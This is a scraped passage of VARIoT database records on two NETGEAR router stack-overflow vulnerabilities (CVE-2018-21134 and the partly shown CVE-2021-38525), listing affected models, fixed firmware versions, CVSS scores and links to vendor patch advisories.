"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-202004-1570",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "r6700",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.1.48"
},
{
"model": "r7900",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.2.16"
},
{
"model": "r6900",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.1.48"
},
{
"model": "r7000p",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.3.1.44"
},
{
"model": "r6900p",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.3.1.44"
},
{
"model": "r6250",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.4.30"
},
{
"model": "r6400",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.1.44"
},
{
"model": "r7000",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.9.34"
},
{
"model": "r7100lg",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.0.48"
},
{
"model": "r7300",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.0.68"
},
{
"model": "r8000",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.4.18"
},
{
"model": "r8000p",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.4.1.24"
},
{
"model": "r7900p",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.4.1.24"
},
{
"model": "r8500",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.2.122"
},
{
"model": "r8300",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.2.122"
},
{
"model": "ex3700",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.0.72"
},
{
"model": "ex3800",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.0.72"
},
{
"model": "ex6000",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.0.32"
},
{
"model": "ex6100",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.2.24"
},
{
"model": "ex6120",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.0.42"
},
{
"model": "ex6130",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.0.24"
},
{
"model": "ex6200",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.3.88"
},
{
"model": "ex7000",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.0.66"
},
{
"model": "d6220",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.0.46"
},
{
"model": "d6400",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.0.82"
},
{
"model": "d8500",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.3.42"
},
{
"model": "d7000",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.0.51"
},
{
"model": "r6300",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.4.32"
},
{
"model": "ex6150",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.0.42"
},
{
"model": "wn2500rp",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.1.54"
},
{
"model": "r6400",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.2.60"
},
{
"model": "r6250",
"scope": "eq",
"trust": 0.8,
"vendor": "netgear",
"version": "1.0.4.30"
},
{
"model": "r6300",
"scope": "eq",
"trust": 0.8,
"vendor": "netgear",
"version": "v2 1.0.4.32"
},
{
"model": "r6400",
"scope": "eq",
"trust": 0.8,
"vendor": "netgear",
"version": "1.0.1.44"
},
{
"model": "r6400",
"scope": "eq",
"trust": 0.8,
"vendor": "netgear",
"version": "v2 1.0.2.60"
},
{
"model": "r6700",
"scope": "eq",
"trust": 0.8,
"vendor": "netgear",
"version": "1.0.1.48"
},
{
"model": "r6900",
"scope": "eq",
"trust": 0.8,
"vendor": "netgear",
"version": "1.0.1.48"
},
{
"model": "r6900p",
"scope": "eq",
"trust": 0.8,
"vendor": "netgear",
"version": "1.3.1.44"
},
{
"model": "r7000",
"scope": "eq",
"trust": 0.8,
"vendor": "netgear",
"version": "1.0.9.34"
},
{
"model": "r7000p",
"scope": "eq",
"trust": 0.8,
"vendor": "netgear",
"version": "1.3.1.44"
},
{
"model": "r7900",
"scope": "eq",
"trust": 0.8,
"vendor": "netgear",
"version": "1.0.2.16"
},
{
"model": "r6300v2",
"scope": "lt",
"trust": 0.6,
"vendor": "netgear",
"version": "1.0.4.32"
},
{
"model": "r6400v2",
"scope": "lt",
"trust": 0.6,
"vendor": "netgear",
"version": "1.0.2.60"
},
{
"model": "wn2500rpv2",
"scope": "lt",
"trust": 0.6,
"vendor": "netgear",
"version": "1.0.1.54"
},
{
"model": "ex6150v1",
"scope": "lt",
"trust": 0.6,
"vendor": "netgear",
"version": "1.0.0.42"
},
{
"model": "d7000v2",
"scope": "lt",
"trust": 0.6,
"vendor": "netgear",
"version": "1.0.0.51"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2021-50925"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-016411"
},
{
"db": "NVD",
"id": "CVE-2018-21134"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"cpe_match": [
{
"cpe22Uri": "cpe:/o:netgear:r6250_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:netgear:r6300_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:netgear:r6400_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:netgear:r6700_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:netgear:r6900_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:netgear:r6900p_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:netgear:r7000_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:netgear:r7000p_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:netgear:r7900_firmware",
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2018-016411"
}
]
},
"cve": "CVE-2018-21134",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "nvd@nist.gov",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"id": "CVE-2018-21134",
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"severity": "HIGH",
"trust": 1.0,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Low",
"accessVector": "Network",
"authentication": "None",
"author": "NVD",
"availabilityImpact": "Partial",
"baseScore": 7.5,
"confidentialityImpact": "Partial",
"exploitabilityScore": null,
"id": "JVNDB-2018-016411",
"impactScore": null,
"integrityImpact": "Partial",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "High",
"trust": 0.8,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "CNVD",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"id": "CNVD-2021-50925",
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"severity": "HIGH",
"trust": 0.6,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "nvd@nist.gov",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 3.9,
"id": "CVE-2018-21134",
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
{
"attackComplexity": "LOW",
"attackVector": "ADJACENT",
"author": "cve@mitre.org",
"availabilityImpact": "LOW",
"baseScore": 6.8,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 2.1,
"id": "CVE-2018-21134",
"impactScore": 4.7,
"integrityImpact": "LOW",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AV:A/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:L",
"version": "3.0"
},
{
"attackComplexity": "Low",
"attackVector": "Network",
"author": "NVD",
"availabilityImpact": "High",
"baseScore": 9.8,
"baseSeverity": "Critical",
"confidentialityImpact": "High",
"exploitabilityScore": null,
"id": "JVNDB-2018-016411",
"impactScore": null,
"integrityImpact": "High",
"privilegesRequired": "None",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "None",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2018-21134",
"trust": 1.0,
"value": "CRITICAL"
},
{
"author": "cve@mitre.org",
"id": "CVE-2018-21134",
"trust": 1.0,
"value": "MEDIUM"
},
{
"author": "NVD",
"id": "JVNDB-2018-016411",
"trust": 0.8,
"value": "Critical"
},
{
"author": "CNVD",
"id": "CNVD-2021-50925",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "CNNVD",
"id": "CNNVD-202004-2025",
"trust": 0.6,
"value": "CRITICAL"
}
]
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2021-50925"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-016411"
},
{
"db": "CNNVD",
"id": "CNNVD-202004-2025"
},
{
"db": "NVD",
"id": "CVE-2018-21134"
},
{
"db": "NVD",
"id": "CVE-2018-21134"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Certain NETGEAR devices are affected by a stack-based buffer overflow by an unauthenticated attacker. This affects R6700 before 1.0.1.48, R7900 before 1.0.2.16, R6900 before 1.0.1.48, R7000P before 1.3.1.44, R6900P before 1.3.1.44, R6250 before 1.0.4.30, R6300v2 before 1.0.4.32, R6400 before 1.0.1.44, R6400v2 before 1.0.2.60, R7000 before 1.0.9.34, R7100LG before 1.0.0.48, R7300 before 1.0.0.68, R8000 before 1.0.4.18, R8000P before 1.4.1.24, R7900P before 1.4.1.24, R8500 before 1.0.2.122, R8300 before 1.0.2.122, WN2500RPv2 before 1.0.1.54, EX3700 before 1.0.0.72, EX3800 before 1.0.0.72, EX6000 before 1.0.0.32, EX6100 before 1.0.2.24, EX6120 before 1.0.0.42, EX6130 before 1.0.0.24, EX6150v1 before 1.0.0.42, EX6200 before 1.0.3.88, EX7000 before 1.0.0.66, D7000v2 before 1.0.0.51, D6220 before 1.0.0.46, D6400 before 1.0.0.82, and D8500 before 1.0.3.42. plural NETGEAR The device is vulnerable to out-of-bounds writes.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be put into a state. NETGEAR R6700, etc. are all products of NETGEAR. NETGEAR R6700 is a wireless router. NETGEAR R7900 is a wireless router. NETGEAR EX3700 is a wireless network signal extender. The vulnerability stems from the fact that when the network system or product performs operations on the memory, the data boundary is not correctly verified, resulting in incorrect read and write operations to other associated memory locations. Attackers can use this vulnerability to cause buffer overflow or heap overflow",
"sources": [
{
"db": "NVD",
"id": "CVE-2018-21134"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-016411"
},
{
"db": "CNVD",
"id": "CNVD-2021-50925"
}
],
"trust": 2.16
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2018-21134",
"trust": 3.0
},
{
"db": "JVNDB",
"id": "JVNDB-2018-016411",
"trust": 0.8
},
{
"db": "CNVD",
"id": "CNVD-2021-50925",
"trust": 0.6
},
{
"db": "CNNVD",
"id": "CNNVD-202004-2025",
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2021-50925"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-016411"
},
{
"db": "CNNVD",
"id": "CNNVD-202004-2025"
},
{
"db": "NVD",
"id": "CVE-2018-21134"
}
]
},
"id": "VAR-202004-1570",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2021-50925"
}
],
"trust": 1.05340316
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"Network device"
],
"sub_category": null,
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2021-50925"
}
]
},
"last_update_date": "2024-11-23T22:33:27.982000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "Security Advisory for Pre-Authentication Stack Overflow on Some Routers and Wireless Extenders, PSV-2017-2019",
"trust": 0.8,
"url": "https://kb.netgear.com/000060226/Security-Advisory-for-Pre-Authentication-Stack-Overflow-on-Some-Routers-and-Wireless-Extenders-PSV-2017-2019"
},
{
"title": "Patch for Buffer overflow vulnerabilities in multiple NETGEAR products (CNVD-2021-50925)",
"trust": 0.6,
"url": "https://www.cnvd.org.cn/patchInfo/show/279116"
},
{
"title": "Multiple NETGEAR Product Buffer Error Vulnerability Fix",
"trust": 0.6,
"url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=116781"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2021-50925"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-016411"
},
{
"db": "CNNVD",
"id": "CNNVD-202004-2025"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-787",
"trust": 1.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2018-016411"
},
{
"db": "NVD",
"id": "CVE-2018-21134"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.0,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-21134"
},
{
"trust": 1.6,
"url": "https://kb.netgear.com/000060226/security-advisory-for-pre-authentication-stack-overflow-on-some-routers-and-wireless-extenders-psv-2017-2019"
},
{
"trust": 0.8,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2018-21134"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2021-50925"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-016411"
},
{
"db": "CNNVD",
"id": "CNNVD-202004-2025"
},
{
"db": "NVD",
"id": "CVE-2018-21134"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CNVD",
"id": "CNVD-2021-50925"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-016411"
},
{
"db": "CNNVD",
"id": "CNNVD-202004-2025"
},
{
"db": "NVD",
"id": "CVE-2018-21134"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2020-07-15T00:00:00",
"db": "CNVD",
"id": "CNVD-2021-50925"
},
{
"date": "2020-06-03T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2018-016411"
},
{
"date": "2020-04-23T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202004-2025"
},
{
"date": "2020-04-23T20:15:12.943000",
"db": "NVD",
"id": "CVE-2018-21134"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2021-07-15T00:00:00",
"db": "CNVD",
"id": "CNVD-2021-50925"
},
{
"date": "2020-06-03T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2018-016411"
},
{
"date": "2020-05-06T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202004-2025"
},
{
"date": "2024-11-21T04:02:58.950000",
"db": "NVD",
"id": "CVE-2018-21134"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202004-2025"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "plural NETGEAR Out-of-bounds write vulnerabilities in devices",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2018-016411"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "buffer error",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202004-2025"
}
],
"trust": 0.6
}
}
var-202108-1631
Vulnerability from variot
Certain NETGEAR devices are affected by a stack-based buffer overflow by an authenticated user. This affects D3600 before 1.0.0.76, D6000 before 1.0.0.76, D6200 before 1.1.00.36, D7000 before 1.0.1.70, EX6200v2 before 1.0.1.78, EX7000 before 1.0.1.78, EX8000 before 1.0.1.186, JR6150 before 1.0.1.18, PR2000 before 1.0.0.28, R6020 before 1.0.0.42, R6050 before 1.0.1.18, R6080 before 1.0.0.42, R6120 before 1.0.0.46, R6220 before 1.1.0.80, R6260 before 1.1.0.64, R6300v2 before 1.0.4.34, R6700 before 1.0.2.6, R6700v2 before 1.2.0.36, R6800 before 1.2.0.36, R6900 before 1.0.2.4, R6900P before 1.3.1.64, R6900v2 before 1.2.0.36, R7000 before 1.0.9.42, R7000P before 1.3.1.64, R7800 before 1.0.2.60, R8900 before 1.0.4.12, R9000 before 1.0.4.12, and XR500 before 2.3.2.40. plural NETGEAR The product contains a vulnerability related to out-of-bounds writes.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be in a state. This affects D3600 prior to 1.0.0.76, D6000 prior to 1.0.0.76, D6200 prior to 1.1.00.36, D7000 prior to 1.0.1.70, EX6200v2 prior to 1.0.1.78, EX7000 prior to 1.0.1.78, EX8000 prior to 1.0.1.186, JR6150 prior to 1.0.1.18, PR2000 prior to 1.0.0.28, R6020 prior to 1.0.0.42, R6050 prior to 1.0.1.18, R6080 prior to 1.0.0.42, R6120 prior to 1.0.0.46, R6220 prior to 1.1.0.80, R6260 prior to 1.1.0.64, R6300v2 prior to 1.0.4.34, R6700 prior to 1.0.2.6, R6700v2 prior to 1.2.0.36, R6800 prior to 1.2.0.36, R6900 prior to 1.0.2.4, R6900P prior to 1.3.1.64, R6900v2 prior to 1.2.0.36, R7000 prior to 1.0.9.42, R7000P prior to 1.3.1.64, R7800 prior to 1.0.2.60, R8900 prior to 1.0.4.12, R9000 prior to 1.0.4.12, and XR500 prior to 2.3.2.40
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-202108-1631",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "r7000",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.9.42"
},
{
"model": "xr500",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "2.3.2.40"
},
{
"model": "d7000",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.1.70"
},
{
"model": "d3600",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.0.76"
},
{
"model": "r9000",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.4.12"
},
{
"model": "r6900p",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.3.1.64"
},
{
"model": "r6080",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.0.42"
},
{
"model": "r6260",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.1.0.64"
},
{
"model": "d6200",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.1.00.36"
},
{
"model": "r7000p",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.3.1.64"
},
{
"model": "r7800",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.2.60"
},
{
"model": "d6000",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.0.76"
},
{
"model": "r6220",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.1.0.80"
},
{
"model": "r6700",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.2.0.36"
},
{
"model": "r6120",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.0.46"
},
{
"model": "ex7000",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.1.78"
},
{
"model": "r6050",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.1.18"
},
{
"model": "r6800",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.2.0.36"
},
{
"model": "r6900",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.2.4"
},
{
"model": "r6300",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.4.34"
},
{
"model": "pr2000",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.0.28"
},
{
"model": "r8900",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.4.12"
},
{
"model": "jr6150",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.1.18"
},
{
"model": "r6900",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.2.0.36"
},
{
"model": "ex8000",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.1.186"
},
{
"model": "r6020",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.0.42"
},
{
"model": "r6700",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.2.6"
},
{
"model": "ex6200",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.1.78"
},
{
"model": "d7000",
"scope": null,
"trust": 0.8,
"vendor": "\u30cd\u30c3\u30c8\u30ae\u30a2",
"version": null
},
{
"model": "ex7000",
"scope": null,
"trust": 0.8,
"vendor": "\u30cd\u30c3\u30c8\u30ae\u30a2",
"version": null
},
{
"model": "d6000",
"scope": null,
"trust": 0.8,
"vendor": "\u30cd\u30c3\u30c8\u30ae\u30a2",
"version": null
},
{
"model": "r6020",
"scope": null,
"trust": 0.8,
"vendor": "\u30cd\u30c3\u30c8\u30ae\u30a2",
"version": null
},
{
"model": "d3600",
"scope": null,
"trust": 0.8,
"vendor": "\u30cd\u30c3\u30c8\u30ae\u30a2",
"version": null
},
{
"model": "ex8000",
"scope": null,
"trust": 0.8,
"vendor": "\u30cd\u30c3\u30c8\u30ae\u30a2",
"version": null
},
{
"model": "d6200",
"scope": null,
"trust": 0.8,
"vendor": "\u30cd\u30c3\u30c8\u30ae\u30a2",
"version": null
},
{
"model": "ex6200",
"scope": null,
"trust": 0.8,
"vendor": "\u30cd\u30c3\u30c8\u30ae\u30a2",
"version": null
},
{
"model": "pr2000",
"scope": null,
"trust": 0.8,
"vendor": "\u30cd\u30c3\u30c8\u30ae\u30a2",
"version": null
},
{
"model": "jr6150",
"scope": null,
"trust": 0.8,
"vendor": "\u30cd\u30c3\u30c8\u30ae\u30a2",
"version": null
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2021-010477"
},
{
"db": "NVD",
"id": "CVE-2021-38525"
}
]
},
"cve": "CVE-2021-38525",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
